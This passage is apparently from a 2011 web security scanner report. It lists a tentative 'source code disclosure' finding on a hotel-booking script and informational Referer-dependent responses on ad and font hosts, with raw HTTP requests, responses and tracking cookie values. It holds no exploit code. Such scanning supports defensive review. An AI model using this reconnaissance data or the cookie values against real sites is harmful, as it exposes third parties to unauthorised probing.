...[SNIP]...
<% } %>\n<% if (showResults.length == 0) {\n\tvar colSpan = dates.length + 5;\n%>\n <div class=\"mtx_lst_no_hotel\">
...[SNIP]...
<\/div>\n<% } else { %>\n<% if (showPagination) { %><div class=\"hotelLinks\" id=\"hotel_link\">
...[SNIP]...
<div style=\"float:left; margin-right:5px;\"><% if (pagination.showPreviousButton) { %><a style=\"text-decoration:none\" href=\"javascript:void(0)\" onclick=\"mtx_movePrevious()\">
...[SNIP]...
<div style=\"float:right; margin-left:5px;\"><% if (pagination.showNextButton) { %><a style=\"text-decoration:none\" href=\"javascript:void(0)\" onclick=\"mtx_moveNext()\">
...[SNIP]...
<\/div>\n\t<% if (pagination.numberOfPage > 1) { %>\n\t<div class=\"mtx_lst_page_area\">Page:\n\t<%\n\tvar iStart = 1;\n\tvar iEnd = pagination.numberOfPage;\n\tif (pagination.numberOfPage > 11) {\n\t\tiStart = pagination.pageNo-5; if (iStart < 1) iStart = 1;\n\t\tiEnd = iStart+10;\n\t\tif (iEnd > pagination.numberOfPage) iEnd = pagination.numberOfPage;\n\t}\n\tfor (var j=iStart; j<=iEnd; j++) {\n\t\tif (j==pagination.pageNo) { %>\n\t\t\t<span class=\"mtx_lst_page_current\">
...[SNIP]...
<\/span>\n\t\t<% } else { %>\n\t\t\t<span class=\"mtx_lst_page_link\" onclick=\"mtx_gotoPage('<%=j%>
...[SNIP]...
<\/td>\n <% for (var a=0; a<accomList.length; a+=2) {%>\n <td width=\"8px\" class=\"tdCb\">
...[SNIP]...
<%=a%>\" value=\"<%=accomList[a]%>\" \/>
...[SNIP]...
<%=a%>\"><%=accomList[a]%><\/label>
...[SNIP]...
<\/td>\n <% for (var a=1; a<accomList.length; a+=2) {%>\n <td width=\"8px\" class=\"tdCb\">
...[SNIP]...
<%=a%>\" value=\"<%=accomList[a]%>\" \/>
...[SNIP]...
<%=a%>\"><%=accomList[a]%><\/label>
...[SNIP]...
<div name=\"container\" class=\"mtx_photo_lst_container\">\n<%\n var urlExtraParams = [];\n if (detail.checkIn != null) {\n urlExtraParams.push(['mtxCheckIn', detail.checkIn]);\n urlExtraParams.push(['mtxCheckOut', detail.checkOut]);\n }\n \n if (window['mtx_portal']) {\n urlExtraParams.push(['mtxPortal', window.mtx_portal]);\n }\n \n var urlExtra = \"\";\n var urlParams = \"\";\n for (var i = 0; i < urlExtraParams.length; i++) {\n if (urlParams != \"\") urlParams += \"&\";\n urlParams += urlExtraParams[i][0] + '=' + urlExtraParams[i][1];\n }\n if (urlParams != \"\") urlExtra = \"?\" + urlParams;\n%>\n<div id=\"currencyGroup\" name=\"currencyGroup\" isoCode=\"<%=currency%>\">
...[SNIP]...
<div name=\"currency_area\" class=\"mtx_lst_currency_area\">\n<% var tax_string = (parseFloat(ServicePercent)>0) ? 'exclusive of service tax and fees' : 'tax inclusive'; %>\n<label class=\"mtx_dest_currency_label\">
...[SNIP]...
<select name='ccSelect' onchange='setCurrency(this);'>\n <% for (var i = 0; i < currencies.length; i++) {\n var c = currencies[i];\n %>\n <option value=\"<%=c.code%>|<%=c.rate%>\" <%if (c.selected) {%>selected=\"selected\"<%}%>><%=c.code%> - <%=c.name%><\/option>
...[SNIP]...
<label class=\"mtx_dest_currency_label\">and are <%=tax_string%><\/label>
...[SNIP]...
<\/div>\n\n<% \n\tif (pagination.pageNo == 1) {\n\t\tfor (var i = 0; i < showFeaturedHotels.length; i++) {\n \t\tvar result = showFeaturedHotels[i];\n\t\t\tif ((result.Show) != \"undefined\") if (!result.Show) continue;\n \n \t\tvar hotel_id = parseInt(result.HotelId);\n \t\tvar image_number = hotel_id+1000;\n \t\tvar image_url = \"http:\/\/images.awd.ws\/photos\/\" + image_number + \"\/01.jpg\";\n \t\tif (result.new_images) image_url = 'http:\/\/www.asiawebdirect.com\/media\/images\/hotels\/' + result.HotelId + '\/photo_view.jpg';\n \t\tif (result.WotifId != null && result.WotifId.length > 0 && result.WotifId[0] == 'M') image_url = 'http:\/\/www.asiawebdirect.com\/media\/images\/hotels\/mystery\/photo_view.jpg';\n%>\n\t<div class=\"mtx_photo_lst_hotel_div\">
...[SNIP]...
<a style=\"text-decoration: underline\" href=\"<%=result.url%><%=urlExtra%>\"><img width=\"280\" height=\"187\" border=\"0\" src=\"<%=image_url%>\" onerror=\"replaceImage(this)\">
...[SNIP]...
<img style=\"cursor: pointer;\" onload=\"checkShortlistIcon('<%=result.HotelId%>')\" onclick=\"toggleShortlist(<%=result.HotelId%>);\" src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/save-button.png\" id=\"sl_<%=result.HotelId%>\"\/><\/div>\n\t\t\t<% var original_rate = result.lowestRate.replace(\",\", \"\"); %>\n\t\t\t<div>\n\t\t\t\t<% if (result.lowestRate == 0) { %>\n\t\t\t\t\t<span class=\"mtx_lst_sold\">
...[SNIP]...
<\/span>\n\t\t\t\t<% } else { %>\n\t\t\t\t\t<span class=\"hotelprice1\">
...[SNIP]...
<span name=\"drc\"><%=result.lowestRate%><span class=\"or\"><%=original_rate%>:<%=result.currency%><\/span> <%=result.currency%><\/span>
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\">
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\"><span class=\"mtx_lst_hotel_name1\" id=\"hn_<%=result.HotelId%>\"><%=result.name%><\/span>
...[SNIP]...
<div><%=result.LongArea%><\/div>\n\t\t\t\t<% var rating_display = \"\"; var rating_label = 'STAR RATING';\n\t\t\t\t\t\tfor (var j=0; j<result.rating; j++) rating_display += '<img src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/star.gif\" \/>';\n\t\t\t\t\t\tif (rating_display == '') rating_label = '&nbsp;';\n\t\t\t\t\t%>\n\t\t\t\t\t<div style=\"float:left; margin-top:4px;\">
...[SNIP]...
<span class=\"mtx_lst_star_span\"><%=rating_display%>&nbsp;<\/span>
...[SNIP]...
<span style=\"color:#FFA80F; font-size:8px;\"><%=rating_label%><\/span>
...[SNIP]...
<\/div>\n\t\t\t\t\t<% var guest_rating = '<span style=\"font-size:120%\">';\n\t\t\t\t\t\tvar str_guest_rating = result.guest_rating + \"\";\n\t\t\t\t\t\tif (result.guest_rating > 0) {\n\t\t\t\t\t\t\tguest_rating += str_guest_rating.substr(0, 1) + '<\/span>';\n\t\t\t\t\t\t\tif (str_guest_rating.substr(1) == \"\") {\n\t\t\t\t\t\t\t\tguest_rating += \".0\";\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\tguest_rating += str_guest_rating.substr(1);\n\t\t\t\t\t\t\t} \n\t\t\t\t\t %>\n\t\t\t\t\t<div style=\"float:right; text-align:left; margin-top:4px;\"><div class=\"mtx_lst_guest_rating_value\"><%=guest_rating%><\/div>
...[SNIP]...
<\/div>\n<%\n\t\t}\n\t}\n%>\n\n\n<% for (var i = pagination.startRecord; i < pagination.endRecord; i++) {\n var result = showResults[i];\n if ((result.Show) != \"undefined\") if (!result.Show) continue;\n \n var hotel_id = parseInt(result.HotelId);\n var image_number = hotel_id+1000;\n var image_url = \"http:\/\/images.awd.ws\/photos\/\" + image_number + \"\/01.jpg\";\n if (result.new_images) image_url = 'http:\/\/www.asiawebdirect.com\/media\/images\/hotels\/' + result.HotelId + '\/photo_view.jpg';\n if (result.WotifId != null && result.WotifId.length > 0 && result.WotifId[0] == 'M') image_url = 'http:\/\/www.asiawebdirect.com\/media\/images\/hotels\/mystery\/photo_view.jpg';\n%>\n\t<div class=\"mtx_photo_lst_hotel_div\">
...[SNIP]...
<div class=\"mtx_photo_lst_hotel_image_div\"><% if (result.FeaturedHotel > 0) { %><div class=\"mtx_lst_featuredhotel_photo\">
...[SNIP]...
<a style=\"text-decoration: underline\" href=\"<%=result.url%><%=urlExtra%>\"><img width=\"280\" height=\"187\" border=\"0\" src=\"<%=image_url%>\" onerror=\"replaceImage(this)\">
...[SNIP]...
<img style=\"cursor: pointer;\" onload=\"checkShortlistIcon('<%=result.HotelId%>')\" onclick=\"toggleShortlist(<%=result.HotelId%>);\" src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/save-button.png\" id=\"sl_<%=result.HotelId%>\"\/><\/div>\n\t\t\t<% var original_rate = result.lowestRate.replace(\",\", \"\"); %>\n\t\t\t<div>\n\t\t\t\t<% if (result.lowestRate == 0) { %>\n\t\t\t\t\t<span class=\"mtx_lst_sold\">
...[SNIP]...
<\/span>\n\t\t\t\t<% } else { %>\n\t\t\t\t\t<span class=\"hotelprice1\">
...[SNIP]...
<span name=\"drc\"><%=result.lowestRate%><span class=\"or\"><%=original_rate%>:<%=result.currency%><\/span> <%=result.currency%><\/span>
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\">
...[SNIP]...
<a href=\"<%=result.url%><%=urlExtra%>\"><span class=\"mtx_lst_hotel_name1\" id=\"hn_<%=result.HotelId%>\"><%=result.name%><\/span>
...[SNIP]...
<div><%=result.LongArea%><\/div>\n\t\t\t\t<% var rating_display = \"\"; var rating_label = 'STAR RATING';\n\t\t\t\t\t\tfor (var j=0; j<result.rating; j++) rating_display += '<img src=\"http:\/\/rates.asiawebdirect.com\/asahi\/images\/star.gif\" \/>';\n\t\t\t\t\t\tif (rating_display == '') rating_label = '&nbsp;';\n\t\t\t\t\t%>\n\t\t\t\t\t<div style=\"float:left; margin-top:4px;\">
...[SNIP]...
<span class=\"mtx_lst_star_span\"><%=rating_display%>&nbsp;<\/span>
...[SNIP]...
<span style=\"color:#FFA80F; font-size:8px;\"><%=rating_label%><\/span>
...[SNIP]...
<\/div>\n\t\t\t\t\t<% var guest_rating = '<span style=\"font-size:120%\">';\n\t\t\t\t\t\tvar str_guest_rating = result.guest_rating + \"\";\n\t\t\t\t\t\tif (result.guest_rating > 0) {\n\t\t\t\t\t\t\tguest_rating += str_guest_rating.substr(0, 1) + '<\/span>';\n\t\t\t\t\t\t\tif (str_guest_rating.substr(1) == \"\") {\n\t\t\t\t\t\t\t\tguest_rating += \".0\";\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\tguest_rating += str_guest_rating.substr(1);\n\t\t\t\t\t\t\t} \n\t\t\t\t\t %>\n\t\t\t\t\t<div style=\"float:right; text-align:left; margin-top:4px;\"><div class=\"mtx_lst_guest_rating_value\"><%=guest_rating%><\/div>
...[SNIP]...
<% } %>\n<% if (showResults.length == 0) {\n\tvar colSpan = dates.length + 5;\n%>\n <div class=\"mtx_lst_no_hotel\">
...[SNIP]...
<\/div>\n<% } else { %>\n<% if (showPagination) { %><div class=\"hotelLinks\" id=\"hotel_link\">
...[SNIP]...
<div style=\"float:left; margin-right:5px;\"><% if (pagination.showPreviousButton) { %><a style=\"text-decoration:none\" href=\"javascript:void(0)\" onclick=\"mtx_movePrevious()\">
...[SNIP]...
<div style=\"float:right; margin-left:5px;\"><% if (pagination.showNextButton) { %><a style=\"text-decoration:none\" href=\"javascript:void(0)\" onclick=\"mtx_moveNext()\">
...[SNIP]...
<\/div>\n\t<% if (pagination.numberOfPage > 1) { %>\n\t<div class=\"mtx_lst_page_area\">Page:\n\t<%\n\tvar iStart = 1;\n\tvar iEnd = pagination.numberOfPage;\n\tif (pagination.numberOfPage > 11) {\n\t\tiStart = pagination.pageNo-5; if (iStart < 1) iStart = 1;\n\t\tiEnd = iStart+10;\n\t\tif (iEnd > pagination.numberOfPage) iEnd = pagination.numberOfPage;\n\t}\n\tfor (var j=iStart; j<=iEnd; j++) {\n\t\tif (j==pagination.pageNo) { %>\n\t\t\t<span class=\"mtx_lst_page_current\">
...[SNIP]...
<\/span>\n\t\t<% } else { %>\n\t\t\t<span class=\"mtx_lst_page_link\" onclick=\"mtx_gotoPage('<%=j%>
...[SNIP]...
<div name=\"container\" class=\"mtx_photo_lst_container\">\n<%\n var urlExtraParams = [];\n if (detail.checkIn != null) {\n urlExtraParams.push(['mtxCheckIn', detail.checkIn]);\n urlExtraParams.push(['mtxCheckOut', detail.checkOut]);\n }\n \n if (window['mtx_portal']) {\n urlExtraParams.push(['mtxPortal', window.mtx_portal]);\n }\n \n var urlExtra = \"\";\n var urlParams = \"\";\n for (var i = 0; i < urlExtraParams.length; i++) {\n if (urlParams != \"\") urlParams += \"&\";\n urlParams += urlExtraParams[i][0] + '=' + urlExtraParams[i][1];\n }\n if (urlParams != \"\") urlExtra = \"?\" + urlParams;\n%>\n<% for (var i = 0; i < places.results.length; i++) {\n var result = places.results[i];\n \n var image_url = '\/media\/images\/destinations\/header\/' + result.id + '_medium.jpg';\n if (places.show_header && (i==0 || places.results[i-1].header!=places.results[i].header)) {\n%>\n\t<p class=\"mtxGroupHeader\" style=\"clear:both;\"><%=result.header%><\/p>\n<% } %>\n\t<div style=\"cursor:pointer\" class=\"normal_card\" onclick=\"switchMtxViewWithA('<%=result.target_anchor_name%>')\">
...[SNIP]...
<img height=\"72\" border=\"0\" width=\"226\" onerror=\"replaceCardImage(this)\" src=\"<%=image_url%>\" \/>
...[SNIP]...
<div class=\"normal_card_text\"><%=result.name%><\/div>
...[SNIP]...
15.8. http://rates.asiawebdirect.com/asahi/js/all_scripts_no_prototype2.jsi  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://rates.asiawebdirect.com
Path:   /asahi/js/all_scripts_no_prototype2.jsi

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /asahi/js/all_scripts_no_prototype2.jsi HTTP/1.1
Host: rates.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://hotels.asiawebdirect.com/thailand/phuket/hotels/?mtxPortal=phuket.com&mtxDestinationId=75&mtxCatRange=1-5&mtxPriceRange=0-Unlimited&mtxCheckIn=20110624&mtxCheckOut=20110625&mtxSortBy=Category&mtxBoxName=phuket.com%20small%20box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=191982906.00014641700566752900:4:1; __utmxx=191982906.00014641700566752900:3251620:2592000

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:21:23 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 12 May 2011 06:19:27 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 173537
Content-Type: text/javascript

var imagelang = 'en' ; var currlang = 'en' ; var prefixpath = 'http://static.asiawebdirect.com/awd/' ; hasShortType = 'true';    
var httphrefShort = location.href;
httphrefShort = httphrefShort.replace
...[SNIP]...
troduce the data as local variables using with(){}
"with(obj){p.push(" +

// Convert the template into pure JavaScript

str
.replace(/[\r\t\n]/g, " ")
.split("<%").join("\t")
.replace(/\t=(.*?)%>/g, "'/*en*/,$1,/*st*/'")
.split("\t").join("'/*en*/);")
.split("%>
...[SNIP]...
e the data as local variables using with(){}
    "with(obj){p.push(" +
   
    // Convert the template into pure JavaScript

    str
    .replace(/[\r\t\n]/g, " ")
    .split("<%").join("\t")
    .replace(/\t=(.*?)%>/g, "'/*en*/,$1,/*st*/'")
    .split("\t").join("'/*en*/);")
    .split("%>
...[SNIP]...
16. Referer-dependent response  previous  next
There are 8 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

16.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Request 1

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response 1

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:00 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_06-20-2011-20-17-03; expires=Mon, 27-Jun-2011 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-24-2011-13-31-00_11394222771308922260; expires=Wed, 22-Jun-2016 13:31:00 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_11394222771308922260; expires=Fri, 24-Jun-2011 13:46:00 GMT; path=/; domain=c3metrics.com
Content-Length: 6651
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if(!window.c3Vinter){function c3VTJSInter(){this.c3VInter={c3VJSurl:'c3VTabstrct-6-2.php'},this.c3VTVersion={vNo:'6.1.0',feature:'mNs+uI+in-view only+KL-for domain check, not CID'},this.c3VJS={c3VJSvtlog:'vtcall.php',c3VJSnid:'',c3VJScid:'',c3VJSuid:'',c3VJSnuid:'',c3VJSdomain:null,c3VJStv:'',c3VJSSPlitchar:'-',c3VJSunique:null,c3VJStag:0,c3VJSrun:0,c3Vresult:1,c3VJSuidSet:'',c3VJSrvSet:'',c3VJShold:new Array(),c3VJSsrcTag:0,c3VJSviewPortW:0,c3VJSviewPortH:0,c3VJSlimitW:600,c3VJSendW:300,c3VJSlimitH:600,c3VJSviewDelay:'',c3VJSinViewPid:null,c3VJSviewportwidth:0,c3VJSviewportheight:0,c3VJSeleTop:0,c3VJSeleBot:0,c3VJSeleLeft:0,c3VJSeleRight:0,c3VJSsrollLeft:0,c3VJSsrollTop:0,c3VJSevent:0,c3VTobjectName:0,c3VJScallurl:null,srcTag:0},this.C3VJSFindBaseurl=function(a,b){var c=document.getElementsByTagName('script');var d;var e;var f;var g;if(a.search('/')!=-1){var h=a.split('/');f=h[1]}else{f=a}var j=c.length;for(var i=0;i<j;i++){e=c[i].src;var k=new Array();k=e.split('?');d=k[0].search(b);if(d!=-1){g=k[0].replace(b,f);i=j}}return g},this.loadNewP=function(){var a=String(Math.floor(Math.random()*100));this.c3VJS.c3VJSinViewPid=a;try{b=document.createElement('<p id='+this.c3VJS.c3VJSinViewPid+'></p>')}catch(e){var b=document.createElement('p');b.setAttribute('id',this.c3VJS.c3VJSinViewPid)}var
...[SNIP]...

Request 2

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_16385998991308836687; SERVERID=s3

Response 2

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:31:07 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 0
Connection: close
Content-Type: text/html

16.2. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://d1.openx.org
Path:   /afr.php

Request 1

GET /afr.php?zoneid=35369&cb=-3648526499830615387 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; OAID=62614e7a17a25044ace97fcfa762d977

Response 1

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:20:36 GMT; path=/
Content-Length: 1196
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='http://d1.openx.org/ck.php?oaparams=2__bannerid=456558__zoneid=35369__OXLCA=1__cb=573378ded2__r_id=e80385b7a5e5b704171b8a6afb760d6f__r_ts=lnaqec__oadest=http%3A%2F%2Fwww.asiawebdirect.com%2Ftwittertriviathursday%2F%3Fpid%3DAWDINP582' target='_blank'><img src='http://i-cdn.servedbyopenx.com/273/2732b2df3db1100300d49e826d822014ea3e23e2/f9a/f9afbea28022d1b95872660e3310e2da.jpg' width='600' height='70' alt='' title='' border='0' /></a><div id='beacon_573378ded2' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d1.openx.org/lg.php?bannerid=456558&amp;campaignid=217835&amp;zoneid=35369&amp;loc=http%3A%2F%2Fphuket.com%2F&amp;cb=573378ded2&amp;r_id=e80385b7a5e5b704171b8a6afb760d6f&amp;r_ts=lnaqec' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>

Request 2

GET /afr.php?zoneid=35369&cb=-3648526499830615387 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OACCAP=86574.1; OAID=62614e7a17a25044ace97fcfa762d977

Response 2

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=62614e7a17a25044ace97fcfa762d977; expires=Sat, 23-Jun-2012 13:20:37 GMT; path=/
Content-Length: 1161
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='http://d1.openx.org/ck.php?oaparams=2__bannerid=456558__zoneid=35369__OXLCA=1__cb=73750003b9__r_id=b6b610782b26a6562203ef36dc21db42__r_ts=lnaqed__oadest=http%3A%2F%2Fwww.asiawebdirect.com%2Ftwittertriviathursday%2F%3Fpid%3DAWDINP582' target='_blank'><img src='http://i-cdn.servedbyopenx.com/273/2732b2df3db1100300d49e826d822014ea3e23e2/f9a/f9afbea28022d1b95872660e3310e2da.jpg' width='600' height='70' alt='' title='' border='0' /></a><div id='beacon_73750003b9' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d1.openx.org/lg.php?bannerid=456558&amp;campaignid=217835&amp;zoneid=35369&amp;cb=73750003b9&amp;r_id=b6b610782b26a6562203ef36dc21db42&amp;r_ts=lnaqed' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>
</body>
</html>
16.3. http://use.typekit.com/k/dum7haf-e.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://use.typekit.com
Path:   /k/dum7haf-e.css

Request 1

GET /k/dum7haf-e.css?3bb2a6e53c9684ffdc9a9bf71d5b2a620e68abb153386c46ebe547777804ad2407379823584cebfee0ce547200d2fd4cde8e2f7f582300b31b12ddcbb95cae6e586d9f691b7f1c36804dcd2dfe8e813458c5f7dcbb55cc320799085b087b2b43b4f2d42e5948f657475ff95a665172f3c5b20e4067 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://www.ea.com/1/product-eulas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/css
Date: Fri, 24 Jun 2011 13:46:08 GMT
ETag: "4037928142+gzip"
Expires: Fri, 24 Jun 2011 13:51:08 GMT
Last-Modified: Thu, 02 Jun 2011 16:28:51 GMT
Server: ECS (dca/53C5)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 131822

/*{"version":"3601976","mac":"1:38a5ce4f8d20b63d13b073eedcc85780f6414fdfa6a8301f64ca9dc70558aa99","k":"0.9.7","created":"2011-06-02T16:28:53Z"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @name Locator Web
* @vendorname Process Type Foundry
* @vendorurl
* @licenseurl http://typekit.com/fonts/4d7ab54860/eula
*
* (c) 2011 Typekit, Inc.
*/

@font-face {
font-family:"locator-web-1";
src:url(data:font/opentype;base64,d09GRgABAAAAAGjMABEAAAAA9nQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAABosAAAABwAAAAcWB5/J0dERUYAAF6YAAAAHgAAACABJQAER1BPUwAAXuQAAAnJAAAUGrLcyVpHU1VCAABeuAAAACwAAAAwuP+4/k9TLzIAAAH0AAAAUwAAAGBXHuyiY21hcAAABKwAAAHxAAACYr4QMWxjdnQgAAAH/AAAABoAAAAaAOAEUmZwZ20AAAagAAABAgAAAXMGWZw3Z2x5ZgAACgwAAFFcAADQFEsFBtpoZWFkAAABgAAAADQAAAA29yvmYGhoZWEAAAG0AAAAIAAAACQH8ASBaG10eAAAAkgAAAJiAAAD4AiJMHtsb2NhAAAIGAAAAfIAAAHyVMUgem1heHAAAAHUAAAAIAAAACADEAPNbmFtZQAAW2gAAAGzAAADhPOmm+dwb3N0AABdHAAAAXoAAAIfYUTnY3ByZXAAAAekAAAAVwAAAHJO0y+WeNpjYGRgYGBmOPK+VOdVPL/NVwZ55hdAEYaTxy7qwuj/l/99Z5nGnAbkcjAwgUQBwmcP2njaY2BkYGBu+XeFgYHl0v/L/x+xTGMAiqCAHwC7IQh3AAEAAAD4AHwABwBJAAQAAQAAAAAACgAAAgADBgACAAF42mNgZpJhnMDAysDAtIepi4GBoQdCM95lMGL4BRQFSjGDKJYGBob1DgwKXgxQoAAEDECB30xM7/6zMTAwtzDqAIUZQXKMz5lmgZQwMAEAtPIN+AB42m2TTUhUURTH//c8jYq+8KMQQghjmhIhpnKyxmJCRZqoRzJFAzGSbvpwXYQQzsIg2rmJsHWbIIsWLQrXgX1qtLFFBEktwoVoZvb63eckIj74c+4579xz
...[SNIP]...

Request 2

GET /k/dum7haf-e.css?3bb2a6e53c9684ffdc9a9bf71d5b2a620e68abb153386c46ebe547777804ad2407379823584cebfee0ce547200d2fd4cde8e2f7f582300b31b12ddcbb95cae6e586d9f691b7f1c36804dcd2dfe8e813458c5f7dcbb55cc320799085b087b2b43b4f2d42e5948f657475ff95a665172f3c5b20e4067 HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
